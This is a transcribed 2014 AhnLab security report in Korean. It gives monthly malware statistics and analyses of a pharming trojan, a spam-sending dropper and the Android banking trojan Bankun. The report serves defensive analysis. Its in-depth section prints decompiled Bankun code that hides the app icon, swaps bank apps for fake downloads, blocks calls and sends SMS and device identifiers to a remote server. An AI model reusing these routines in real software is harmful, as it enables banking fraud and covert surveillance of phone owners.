Security Trend ASEC Report VOL.57 September, 2014

Transcription

1 Security Trend ASEC Report VOL.57 September, 2014

2 ASEC Report VOL.57 September, 2014 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며, 매월발생한주요보안위협과이슈에대응하는최신보안기술에대한요약정 보를담고있습니다. 자세한내용은안랩닷컴 ( 에서확인하실수있습니다 년 9 월보안동향 1 보안통계 STATISTICS 01 악성코드통계 02 웹통계 03 모바일통계 Table of Contents 보안이슈 SECURITY ISSUE 01 금융정보를탈취하는파밍악성코드 02 스미싱형태로유포되는 뱅쿤 (BANKUN) 주의! 03 내가스팸메일발송자? 스팸메일을발송하는악성코드 악성코드상세분석 Analysis-In-Depth 01 구글플레이 (Google Play) 앱을사칭한악성앱 19 ASEC REPORT 57 Security Trend 2

3 1 보안통계 STATISTICS 01 악성코드통계 02 웹통계 03 모바일통계 ASEC REPORT 57 Security Trend

4 보안통계 01 악성코드통계 Statistics ASEC 이집계한바에따르면, 2014 년 9 월한달간탐지된악성코드수는 252 만 3,094 건으로나타났다. 이 는전월 289 만 7,479 건에비해 37 만 4,385 건감소한수치다. 한편 9 월에수집된악성코드샘플수는 465 만 555 건으로집계됐다. [ 그림 1-1] 에서 탐지건수 란고객이사용중인 V3 등안랩의제품이탐지한악성코드의수를의미하며, 샘플 수집수 는안랩이자체적으로수집한전체악성코드샘플수를의미한다. 5,000,000 4,000,000 3,000,000 2,000,000 2,257,733 2,897,479 2,523,094 1,000, ,519,765 7 월 3,596,157 8 월 4,650,555 9 월 탐지건수샘플수집수 [ 그림 1-1] 악성코드추이 ASEC REPORT 57 Security Trend 4

5 [ 그림 1-2] 는 2014 년 9 월한달간유포된악성코드를주요유형별로집계한결과이다. 불필요한프로그 램인 PUP(Potentially Unwanted Program) 가 56.32% 로가장높은비중을차지했고, 트로이목마 (Trojan) 계열의악성코드가 20.81%, 애드웨어 (Adware) 가 7.43% 로그뒤를이었다. 0.68% 5.31% 7.43% 56.32% 9.45% 20.81% PUP Trojan etc Adware Worm Downloader [ 그림 1-2] 주요악성코드유형 [ 표 1-1] 은 9 월한달간가장빈번하게탐지된악성코드 10 건을진단명기준으로정리한것이다. Adware/Win32.SwiftBrowse 가총 32 만 2,808 건으로가장많이탐지되었고, Adware/Win32. SearchSuite 가 16 만 6,569 건으로그뒤를이었다. [ 표 1-1] 악성코드탐지최다 10건 ( 진단명기준 ) 순위 악성코드진단명 탐지건수 1 Adware/Win32.SwiftBrowse 322,808 2 Adware/Win32.SearchSuite 166,569 3 PUP/Win32.SwiftBrowse 102,640 4 Trojan/Win64.SwiftBrowse 86,289 5 Trojan/Win32.OnlineGameHack 84,313 6 Trojan/Win32.Agent 73,619 7 ASD.Prevention 67,765 8 PUP/Win32.IntClient 56,031 9 Malware/Win32.Generic 45, Adware/Win32.Agent 40,932 ASEC REPORT 57 Security Trend 5

6 보안통계 02 웹통계 Statistics 2014 년 9 월악성코드유포지로악용된도메인은 1,338 개, URL 은 1 만 5,842 개로집계됐다. 또한 9 월의 악성도메인및 URL 차단건수는총 354 만 5,673 건이다. 악성도메인및 URL 차단건수는 PC 등시스템 이악성코드유포지로악용된웹사이트에접속하는것을차단한수이다. 6,000,000 5,343,498 5,000,000 4,000,000 3,928,542 3,545,673 3,000,000 2,000,000 1,000,000 40,000 30,000 30,918 20,000 12,241 15,842 10,000 1,718 1,902 1,338 악성도메인 /URL 차단건수 악성코드유포도메인수 0 7 월 8 월 9 월 악성코드유포 URL 수 [ 그림 1-3] 악성코드유포도메인 /URL 탐지및차단건수 ASEC REPORT 57 Security Trend 6

7 보안통계 03 모바일통계 Statistics 2014 년 9 월한달간탐지된모바일악성코드는 7 만 5,938 건으로나타났다. 250, , , ,000 74,678 74,413 75,938 50, 월 8 월 9 월 [ 그림 1-4] 모바일악성코드추이 ASEC REPORT 57 Security Trend 7

8 [ 표 1-2] 는 9 월한달간탐지된모바일악성코드유형중상위 10 건을정리한것이다. Android-Trojan/ SmsSend, Android-Trojan/SMSAgent, Android-Trojan/SmsSpy 와같이수신된 SMS 를유출 하거나몰래 SMS 를발송하는유형의악성코드가점차증가하고있다. [ 표 1-2] 유형별모바일악성코드탐지상위 10 건 순위악성코드진단명탐지건수 1 Android-PUP/Dowgin 18,243 2 Android-Trojan/FakeInst 15,311 3 Android-PUP/SMSReg 5,238 4 Android-Trojan/Opfake 2,409 5 Android-Trojan/SmsSend 1,803 6 Android-Trojan/Agent 1,579 7 Android-Trojan/SMSAgent 1,578 8 Android-PUP/Wapsx 1,460 9 Android-Trojan/SmsSpy 1, Android-PUP/SMSpay 1,240 ASEC REPORT 57 Security Trend 8

9 2 보안이슈 SECURITY ISSUE 01 금융정보를탈취하는파밍악성코드 02 스미싱형태로유포되는 뱅쿤 (BANKUN) 주의! 03 내가스팸메일발송자? 스팸메일을발송하는악성코드 ASEC REPORT 57 Security Trend

10 보안이슈 01 금융정보를탈취하는파밍악성코드 Security Issue 최근사용자의금융정보를탈취하여금전이득을취하는파밍악성코드감염으로금전적인피해사례가증가하고있어주의가요구된다. 해당악성코드는사용자에게 금융정보유출피해예방서비스 라는명목으로금융정보입력을유도하는파밍악성코드이다. 표 2-1 파일생성정보 [ 파일생성정보 ] Bugreport.exe CREATE C: Windows Sdmr.exe Sdmr.exe CREATE C: Windows dmr.exe 최초의악성코드는 Sdmr.exe 를생성하고, 추가로 dmr.exe 라는악성코드를생성한다. 표 2-2 레지스트리등록 [ 레지스트리등록 ] HKLM SYSTEM ControlSet001 Services MyServiceDe mos ImagePath = "C: Windows Sdmr.exe" DisplayName = "My Service Demos" ObjectName = "LocalSystem" 그림 2-1 버그리포트로위장한악성코드속성 금융정보입력을유도하는파밍악성코드의회사정보는중국의인터넷서비스및게임서비스전문업체인 T 사로나타난다. 악성코드는회사정보, 파일이름을변조하여이업체에서제공하는정상파일인 버그리포트 로위장하였다. 해당악성코드를실행하면악성행위를하며파일생성정보는 [ 표 2-1] 과같다. 생성된악성파일은 [ 표 2-2] 와같이시스템재시작시에도반복실행을위해레지스트리값을수정하여 My Service Demos라는이름의서비스를등록한다. 표 2-3 네트워크연결 [ 네트워크연결 ] => 1**.25.*6.*3(80) *************3 감염된 PC 는 [ 표 2-3] 과같이 1**.25.*6.*3 으로 ASEC REPORT 57 Security Trend 10

11 네트워크에연결하여 핀터레스트 (Pinterest) 에접속한다. 핀터레스트는트위터, 페이스북과같은소셜네트워크서비스 (SNS) 이다. 핀터레스트를통해악성파밍사이트의 IP 주소를확인할수있다. 이다. 기존에는파밍악성코드에감염되면정상적인포털사이트동작이불가능했다. 그러나이번에발견된악성코드는감염된 PC에서보안등록안내팝업을 [ 닫기 ] 버튼으로종료하면포털사이트를정상적으로사용할수있다. 리퍼러 (Referer) 를사용했기때문이다. 그림 2-2 핀터레스트에올라온정보 [ 그림 2-2] 는악성코드로접속한핀터레스트에서확인한글이다. 해당글의뒷부분을알파벳기준으로나누면 **6.**.1**.**0이라는 IP 주소를알수있다. **6.**.1**.**0은파밍사이트의 IP 주소로사용된다. SNS에게시된글을통해감염된시스템에서파밍사이트에접속한다. 테스트결과, 악성코드제작자는핀터레스트의글을수정하여파밍사이트의 IP 주소를주기적으로변경했음을알수있었다. 그림 2-4 팝업패킷 리퍼러는현재페이지로이동하기전의페이지주소를말한다. 해당악성코드에감염된시스템에서파밍사이트로의접속유도는포털사이트에접속할때이루어진다. 따라서 [ 그림 2-4] 처럼리퍼러가포털사이트로나타난다. 또한, 팝업에서은행사이트의링크를설정하여은행파밍사이트로접속하도록유도한다. 그림 2-3 보안등록안내팝업창 [ 그림 2-3] 은위의악성코드에감염된 PC 에서포털 사이트에접속하면나타나는보안등록안내팝업창 그림 2-5 은행사이트로위장한파밍사이트 ASEC REPORT 57 Security Trend 11

12 [ 그림 2-5] 는은행사이트로위장한파밍사이트이 다. 팝업화면의 서비스신청하기 외에모든버튼이응답하지않아정상적인은행업무가불가능하다. [ 그림 2-8] 은해당사이트를통해입력된이름, 주민등록번호, 전화번호, 비밀번호를탈취한패킷이다. 입력된주민등록번호의유효여부는확인하지않으며포스트 (POST) 방식으로전송한다. 그림 2-6 은행사이트로위장한파밍사이트소스 [ 그림 2-6] 은은행사이트로위장한파밍사이트에서확인한페이지소스이다. [ 그림 2-2] 의핀터레스트에서확인한 IP 주소가파밍사이트의주소와동일함을알수있다. 기존파밍악성코드는호스트파일, DNS(Domain Name Server) 변조로파밍행위를해왔다. 그러나해당악성코드는시스템에서호스트파일, DNS 를변조하지않는다. 파밍기법에대해잘알고있는사용자라할지라도호스트파일, DNS 변조는나타나지않으면서개인정보를요구하는점으로인해혼란스러울수있다. 신종기법의악성코드가꾸준히등장하고있으므로사용자는이점을염두에두고악성코드가유도하는개인정보입력요구에응하지않도록주의해야한다. 그림 2-7 금융보안센터로위장한파밍사이트 [ 그림 2-7] 도금융보안센터사이트로위장한파밍사이트이다. 개인정보를입력하는페이지를제외한다른페이지는정상적으로동작하지않는다. 또한, 포털사이트와은행사이트에서는금융보안센터사이트로접속을유도하지않으며, 금융정보유출피해예방서비스 도제공하지않는다. 사용자는본래의서비스목적과별다른관계없이개인정보입력을요구하는팝업창이나타나면 V3 등백신의정밀검사를통해악성코드감염여부를확인하는것이필요하다. V3 실시간검사는항상 ON으로설정해두고, 주기적인정밀검사로악성코드를예방하는것이좋다. V3 제품에서는관련악성코드를다음과같이진단한다. <V3 제품군의진단명 > Trojan/Win32.QQPass ( ) 그림 2-8 개인정보를탈취한패킷 ASEC REPORT 57 Security Trend 12

13 보안이슈 02 스미싱형태로유포되는 뱅쿤 (BANKUN) 주의! Security Issue 과거유행했던 돌잔치초대장 으로가장한스미싱이최근들어다시기승을부리고있다. 특히 스미싱 형태로유포되는 뱅쿤 (BANKUN, Bank Uninstall 의줄임말 ) 은정상적인은행앱의삭제를유도하고, 악성앱의설치를시도하는악성코드이다. 이러한유형의악성코드를살펴보고, 감염을예방하는방법을알아보자. 돌잔치초대장으로유포되고있는악성앱을살펴보자. 수신된문자메시지의링크를클릭하면 [ 그림 2-9] 와같이악성앱이설치된다. 패키지명은 com. sdwiurse이며앱의이름은 googl app stoy 이다. 그림 2-10 악성앱의권한정보 [ 그림 2-10] 과같이권한정보를보면악성앱이메시지, 주소록, 저장소, 전화통화등에접근할수있다. 이를통해해당내용을수집할수있음을짐작할수있다. 물론정상앱에서도사용할수있는권한이지만, 악성앱이설치되면스마트폰에설치되어있는은행앱이무엇인지확인한후해당은행의금융정보탈취를시도한다. 그림 2-11 스마트폰에설치된앱체크리스트 그림 2-9 악성앱권한 ( 좌 ) / 설치후아이콘 ( 우 ) 악성앱을실행하면 [ 그림 2-12] 와같이설치가진행된다. 사용자를속이기위해 공지사항 을사용하며가짜이미지를이용하여백신이동작중인것처럼위장한다. ASEC REPORT 57 Security Trend 13

14 악성코드는위와같은정보탈취뿐만아니라 [ 그림 2-15] 와같이추가로악성앱의설치도유도한다. 그림 2-12 악성앱설치화면 이후악성코드는사용자의금융정보탈취를위해공인인증서와개인정보를수집한다. [ 그림 2-13] 은스마트폰의기기정보와사용자가입력하는정보를탈취하는코드중일부이다. 그림 2-15 추가악성앱설치유도 악성앱에의해수집된기기정보, 공인인증서, 금융정보는 [ 그림 2-16] 과같이메일서비스를이용하여특정메일주소로발송된다. 그림 2-13 정보수집코드 [ 그림 2-14] 는사용자의이름, 주민등록번호, 계좌번호, 비밀번호, 보안카드번호와같은개인의금융정보입력을유도하는창이다. 그림 2-16 메일서비스를이용한정보탈취 탈취한정보는 [ 그림 2-17] 과같이악성코드제작자 의메일로전송된다. 그림 2-14 금융정보입력을유도하는창 그림 2-17 악성코드제작자의메일함 ASEC REPORT 57 Security Trend 14

15 [ 그림 2-18] 과같이악성코드제작자메일의첨부파 일에는공인인증서와금융정보가압축되어있다. 치되는경우가많기때문에안전성이확인되지않은 URL이나앱은설치하지않도록주의해야한다. 또한모바일전용보안앱 (V3 모바일등 ) 이나스미싱탐지앱 ( 안랩안전한문자등 ) 을설치하고, 자동업데이트설정으로항상최신엔진을유지해야한다. [ 그림 2-20] 은안랩 안전한문자 의앱에서최근유행하는스미싱의유형을알려주는화면이다. 이러한기능을통해유행하는스미싱정보를사전에인지하여설치하지않도록주의하자. 그림 2-18 금융정보및공인인증서 [ 그림 2-13] 에서사용자가입력한금융정보 ( 이름, 계좌번호, 비밀번호, 보안카드일련번호, 공인인증서암호, 주민등록번호 ) 는 [ 그림 2-19] 의텍스트파일의내용과같이전송된다. 그림 2-19 사용자가입력한금융정보 스마트폰은인터넷, 모바일뱅킹, 게임등을때와장소를가리지않고이용할수있는장점때문에 PC보다사용이더많아졌다. 이런영향으로악성코드제작자는스마트폰을공격대상으로삼고있으며악성앱도증가하고있다. 따라서앱은공식마켓에서내려받는것이안전하지만, 공식마켓에도악성앱이등록되어있는경우가많으므로평판정보를확인하고설치해야한다. 무심코문자에포함된 URL을클릭하면악성앱이설 그림 2-20 안랩 안전한문자 의스미싱알림기능 한편, V3 제품에서는관련악성코드를다음과같이진단한다. <V3 제품군의진단명 > Android-Trojan/Bankun ASEC REPORT 57 Security Trend 15

16 보안이슈 02 내가스팸메일발송자? 스팸메일을발송하는악성코드 Security Issue 나도모르는사이, 내 PC에서외부로대량의스팸메일을발송하고있다면? 받는사람도, 보내는사람도당혹스러울것이다. 최근메모리에로드되어실행되는스팸메일을발송하는악성코드가발견되어사용자의주의가필요하다. 해당악성코드가실행되면정상실행을위해함수복구작업을거쳐악성코드내부에숨겨져있는 PE 파일을복호화한다. 복사한후레지스트리에등록하여재시작시다시동작한다. 그림 2-22 파일생성및레지스트리등록 생성작업을마치면다시한번숨겨진 PE의복호화를진행한다. 그림 2-21 첫번째 PE 복호화 [ 그림 2-21] 과같이복구된 PE는 WriteProcess Memory 작업을통해메모리에사용되고, 해당코드는 [ 그림 2-22] 와같이아래의경로에자기자신을 그림 2-23 두번째 PE 복호화 첫번째복호화된 PE 를바로메모리에썼다면두번째 복호화된 PE 는 [ 그림 2-23] 과같이 svchost.exe ASEC REPORT 57 Security Trend 16

17 를이용하여로드한다. 로드시에는 svchost.exe 프로세스를서스펜드 (SUSPEND) 형태로생성한후 GetContextThread, ReadProcessMemory, WriteProcessMemory, SetThreadContext, ResumeThread 등의함수를통해복호화된 PE 코드를덮어씌운후해당코드로진행한다. 표 2-4 확인된명령어카운트리 (Country) script (run_file, un_mem, random, random_cmd) 데이터 프록시 (Proxy) 그림 2-24 svchost.exe 프로세스를서스펜드형태로생성 이러한작업을거치면최초악성코드가종료되어도 svchost.exe에쓰인악성행위코드에의해동작이계속된다. svchost.exe에로드된악성코드는 C&C와통신하여실제명령을받아오고, 스팸을발생시킨다. 이때주고받는패킷은 [ 그림 2-25] ( 좌 ) 와같이암호화되어있고그키는매번다르다. 파일 - 실제로증상이나타나는 PC에서악성코드를제거했지만, 증상이계속된다는문의가있었다. 결국, 재부팅과같은메모리정리과정에서증상이해결되었는데, 이는악성코드가메모리에로드되어실행되기때문이다. 해당악성코드는하루수만건에가까운스팸메일을발생시킨다. 따라서특정 PC에서갑자기대량의 SMTP 패킷이발생할때는이러한스팸메일을발송하는악성코드를의심해야한다. 그림 2-25 암호화된패킷 ( 좌 ) / 복호화된패킷 ( 우 ) [ 표 2-4] 는서버에서받는명령중확인된내용이다. V3 제품에서는관련악성코드를다음과같이진단한다. <V3 제품군의진단명 > Dropper/Win32.Zbot ( ) ASEC REPORT 57 Security Trend 17

18 3 악성코드상세분석 Analysis-In-Depth 01 구글플레이 (Google Play) 앱을사칭한악성앱 ASEC REPORT 57 Security Trend

19 악성코드상세분석 01 구글플레이 (Google Play) 앱을사칭한악성앱 Analysis-In-Depth 2012년말, 스미싱을통해설치되는악성앱이처음발견된이후지속적으로그수가증가하고있다. 현재월평균 1,500여건이넘는악성앱이발견되고있으며, 지금까지국내스마트폰사용자를대상으로하는스미싱악성앱의유형은 40여종이넘는것으로확인되었다. 이처럼스미싱을통한악성앱유포가증가함에따라스미싱기법은언론보도를통해서도많이알려졌다. 그러나스미싱을통해설치된악성앱의동작이나자세한기능에대해서는여전히알려지지않은편이다. 이글에서는국내에서지속적으로발견되는악성앱중대표적인 구글플레이 (Google Play) 앱을사칭한사례를상세히살펴본다. 구글플레이 (Google Play) 앱을사칭한악성앱은금융정보탈취를목적으로하고있어사용자들의각별한주의가요구된다. 1. 악성앱의설치형태및기능구글에서제공하는안드로이드애플리케이션마켓의정식명칭은 구글플레이 (Google Play) 로, 지난 2012년 3월기존의안드로이드마켓과구글뮤직서비스의상표를새로변경하면서현재의이름을갖게되었다. 중국을제외하면대부분의안드로이드기반의스마트기기에는구글플레이에서앱이나미디어 등을다운로드할수있는 구글플레이앱 이설치되어있다. 공격자들은다수의사용자에게익숙한앱을악용하기마련이다. 이러한맥락에서현재가장많이발견되는악성앱의이름이바로 구글앱스토어 (Google App Store) 이다. 구글플레이앱을사칭하는이악성앱은지금이순간에도설치를유도하는스미싱문자메시지를발송하고있을것이다. 구글플레이앱을사칭한이앱에대한 AhnLab V3 Mobile의진단명은 Android- Trojan/Bankun 으로, 간략하게 뱅쿤 (Bankun) 이라는명칭으로도불린다. 해당악성앱의명칭에나타난 Bank 라는영어단어에서유추할수있는것처럼이앱은금융정보탈취가주목적이다. 이앱은금융정보를탈취하기위해또다른앱을추가로설치하며, 문자메시지나통화기록등주요개인정보를유출하는기능을갖고있다. 특히뱅쿤앱은설치될때동일한아이콘뿐만아니라 구글플레이스토어 (Google Play Store) 라는유사한앱의이름을사용하고있어주의깊게살펴보지않으면예기치않게악성앱을설치하기쉽다. ASEC REPORT 57 Security Trend 19

20 정상앱을사칭한뱅쿤의설치가완료되면 [ 그림 3-1] 과같이 Google App Store 라는이름으로 홈화면에바로가기아이콘이생성된다. 도록홈화면에서스스로아이콘을삭제한다. 그림 3-3 바로가기아이콘이삭제된후의홈화면 그림 3-1 구글앱을사칭한뱅쿤앱의바로가기아이콘 [ 그림 3-1] 의바로가기아이콘을통해뱅쿤을실행하게되면 [ 그림 3-2] 와같이안드로이드기기관리자화면이나타나기기관리자권한을요구한다. 아이콘은삭제되었으나단말기의환경설정에서 애플리케이션관리 기능을확인하면 [ 그림 3-4] 와같이여전히 Google App Store 가설치되어있음을알수있다. 그림 3-4 아이콘삭제후에도존재하는악성앱 그림 3-2 뱅쿤의기기관리자권한요청화면 [ 그림 3-2] 의기기관리자화면에서실행을선택하면별다른화면이나타나지않아바로종료된것처럼보이지만실제로는백그라운드로동작한다. 또한해당앱이설치되었다는사실을사용자가눈치채지못하 [ 그림 3-5] 와같이해당악성앱의네트워크사용기 록을살펴보면설치된기기의전화번호와 IMSI 등의 정보를유출하는것을알수있다. ASEC REPORT 57 Security Trend 20

21 련된민감한권한이포함되어있다. 그림 3-5 뱅쿤의네트워크사용기록 또한설치된기기에서연락처정보를추출하여외부로전송한다. 그림 3-6 뱅쿤이추출하여외부전송한연락처정보 2. 뱅쿤 (Bankun) 구조앞서악성앱, 즉뱅쿤실행시나타나는행위에대해살펴보았다. 지금부터는뱅쿤의내부구조를살펴보자. 우선, 안드로이드앱의명세를가진 AndroidManife st.xml 파일의권한 (Permission) 정보를살펴보면아래와같이상당히많은권한을요구하고있다. 특히문자메시지, 통화, 연락처등과같이개인정보와관 <?xml version='1.0' encoding='utf-8'?> <manifest xmlns:android=" com/apk/res/android" android:versioncode="2" android:versionname="1.1" package=""> ACCESS_WIFI_STATE"/> CHANGE_WIFI_STATE"/> WAKE_LOCK"/> WRITE_EXTERNAL_STORAGE"/> READ_PHONE_STATE"/> SEND_SMS"/> RECEIVE_SMS"/> READ_CONTACTS"/> WRITE_CONTACTS"/> RECEIVE_BOOT_COMPLETED"/> MODIFY_PHONE_STATE"/> CALL_PHONE"/> WRITE_CONTACTS"/> <uses-permission android:name="com.android. launcher.permission.install_shortcut"/> <uses-permission android:name="com.android. launcher.permission.uninstall_shortcut"/> RECEIVE_BOOT_COMPLETED"/> ASEC REPORT 57 Security Trend 21

22 RESTART_PACKAGES"/> GET_TASKS"/> KILL_BACKGROUND_PROCESSES"/> SYSTEM_ALERT_WINDOW"/> READ_LOGS"/> VIBRATE"/> MODIFY_AUDIO_SETTINGS"/> INTERNET"/> ACCESS_NETWORK_STATE"/> </manifest> 디컴파일을통해뱅쿤의주요기능을좀더상세히살펴보자. [ 그림 3-7] 은안랩의모바일악성코드분석도구를이용해 Bankun 코드를시각화 (Visualization) 한것이다. [ 그림 3-7] 에서볼수있는것처럼가장먼저실행되는코드는 MainActivity 클래스이며, 주요기능이집중되어있는코드는 CoreService 클래스라할수있다. MainActivity 클래스는특정서비스를실행하고기기관리자권한을확보하며아이콘을숨기는기능을갖고있다. 다음은 MainActivity 클래스의실제코드이다. public class MainActivity extends Activity { private void activemanager() { v0 = new Intent("android.app.action.ADD_DEVICE_ ADMIN"); v0.putextra("android.app.extra.device_admin", this.componentname); v0.putextra("android.app.extra.add_explanation", "google play"); this.startactivity(v0); return; protected void oncreate(bundle p4) { this.policymanager = this.getsystemservice("device_ policy"); this.componentname = new ComponentName(this, LockReceiver); if(this.policymanager.isadminactive(this. componentname) == 0) { this = this.activemanager(); else { this.policymanager.locknow(); this.startservice(new Intent(this, CoreService)); this.hideicon(); this.finish(); return; 그림 3-7 안랩의모바일악성코드분석도구를통해시각화한뱅쿤코드 private void HideIcon() { ASEC REPORT 57 Security Trend 22

23 this.getpackagemanager().setcomponentenabledse tting(this.getcomponentname(), 2, 1); return; parse(new StringBuilder("package:").append(p5.trim()). tostring())); CoreService 클래스는 MainActivity에의해가장먼저실행되는서비스로, 이서비스의클래스동작은다음과같다. 주기적으로기기정보 ( 전화번호, IMSI 등 ) 를서버로전송함으로써설치된사실을공격자에게알린다. 기기에저장된주소록을서버로전송한다. 기기에설치된은행앱정보를확인하고기존앱을삭제한후, 서버로부터해당은행앱과유사한가짜앱을다운로드하고설치한다. - 루팅된안드로이드기기일경우, 사용자몰래정상은행앱이가짜앱으로교체된다. - 루팅되지않은기기일경우, 은행앱의업데이트안내메시지로위장한메시지가나타나며이에따라업데이트를진행하면가짜은행앱이설치된다. - 가짜은행앱은기기에저장된인증서를유출하고파밍을통해사용자가입력한금융거래와관련된모든정보를외부로전송한다. public class CoreService extends Service { public static void uninstallapk(string p5) { v0 = new Intent("android.intent.action.DELETE", Uri. public void autochangeapk(string p9) { while (v3 < Config.apkNames.length) { if(config.apknames[v3].equals(v1) == 0) { v3 = (v3 + 1); else { this.mapkname = Config.bName[v3]; Config.delPackage = Config.bank[v3]; this.mpackagename = Config.delPackage; v4 = Config.icon[v3]; Config.installApk = DownLoad.downLoadFile(new StringBuilder(String.valueOf(Config.APK_URL)).append(v1). tostring()); v0 = new AlertDialog$Builder(CoreService.mContext); v0.settitle(this.mapkname); v0.setmessage(new StringBuilder(String.valueOf(this. mapkname)).append(" 새로운업데이트가있습니다. 보다더안전한스마트뱅킹을사용하기위하여최신버전을다운받으시기바랍니다.").toString()); v0.setpositivebutton(" 확인 ", new CoreService$BtnClick (this)); v0.setnegativebutton(" 취소 ", new CoreService$BtnClick (this)); v2.show(); CoreService.showNofity(this.mApkName, new StringBuilder(String.valueOf(this.mApkName)).append(" 새로운업데이트가있습니다 ").tostring(), " 최신버전으로보안강화하시기바랍니다 ", v4); ASEC REPORT 57 Security Trend 23

24 PhoneListener 클래스는이름에서볼수있는것처럼전화의수신및발신이벤트를감시하며, 다음과같은기능을갖고있다. 수신및발신을감지하며전화통화를강제종료한다. 진동및벨소리를모두꺼서사용자가전화수신을인지하지못하도록한다. 수신및발신내역을서버로전송한다. 통화기록을삭제한다. public class PhoneListener extends BroadcastReceiver { private void endcall() { v3 = CoreService.mContext.getSystemService("phone"); v2 = TelephonyManager.getDeclaredMethod("getITeleph ony", 0); v2.setaccessible(1); v2.invoke(v3, 0).endCall(); return; public void onreceive(context p8, Intent p9) { v2 = CoreService.mContext. getsystemservice("audio"); v2.setvibratesetting(v6, v6); v2.setringermode(0); switch(p8.getsystemservice("phone").getcallstate()) { case 1: this.endcall(); return; private int DeleteCall(String p6) { return v0.delete(calllog$calls.content_uri, "number=?", v3); SMSReceiver 클래스는 SMS 수신시동작하는클래스로, 아래와같이 SMS 수신내역을지정된서버로내보내는기능을갖고있다. public class SMSReceiver extends BroadcastReceiver { public void onreceive(context p12, Intent p13) { this.content = URLEncoder.encode(v2. getmessagebody().trim()); this.from = v2.getoriginatingaddress(); this.number = Config. getphonenumber(coreservice.mcontext); this.number = Config.number; new Thread(new SMSReceiver$1(this)).start(); this.abortbroadcast(); class SMSReceiver$1 implements Runnable { public void run() { v0 = new StringBuilder(String.valueOf(Config. get(coreservice.mcontext, "serverip", Config. SERVER_HOST))).append(Config.SERVER_ADDRESS). append("smsreceiver&imsi=").append(this.this$0. imsi).append("&number=").append(this.this$0. number).append("&from=").append(this.this$0.from). append("&content=").append(this.this$0.content).tostring(); this.this$0.conn.gethttpconnection(v0); System.out.println(new StringBuilder("SEMRECEIVER_ ASEC REPORT 57 Security Trend 24

25 DATA =>").append(v0).tostring()); 지금까지스미싱을통해설치되는악성앱인뱅쿤 (Bankun) 에대해자세히살펴보았다. 뱅쿤은교묘하게사용자를속이고금융정보를탈취하기위해많은기능들을갖고있다. 이처럼나날이고도화되고지능화되고있는악성앱에의한피해를입지않기위해서는무엇보다사용자의각별한주의가필요하다. 국내에서유포되는안드로이드기기용악성앱의대부분은스미싱기법을이용하므로스미싱차단앱을설치및이용하는것도피해를예방하는방법이될수있다. 기본적으로는문자메시지에포함된알수없는 URL은가급적접속하지않는것이바람직하다. 또한악성앱을실수로설치하게되는경우를대비하여모바일전용백신을설치하여주기적으로악성앱을검사하는것도필요하다. ASEC REPORT 57 Security Trend 25

26 ASEC REPORT vol.57 September, 2014 집필 안랩시큐리티대응센터 (ASEC) 발행처 주식회사안랩 편집 안랩콘텐츠기획팀 경기도성남시분당구판교역로 220 디자인 안랩 UX디자인팀 T F 본간행물의어떤부분도안랩의서면동의없이복제, 복사, 검색시스템으로저장또는전송될수없습니다. 안랩, 안랩로고는안랩의등록상표입니다. 그외다른제품또는회사이름은해당소유자의상표또는등록상표일수있습니다. 본문서에수록된정보는고지없이변경될수있습니다 AhnLab, Inc. All rights reserved.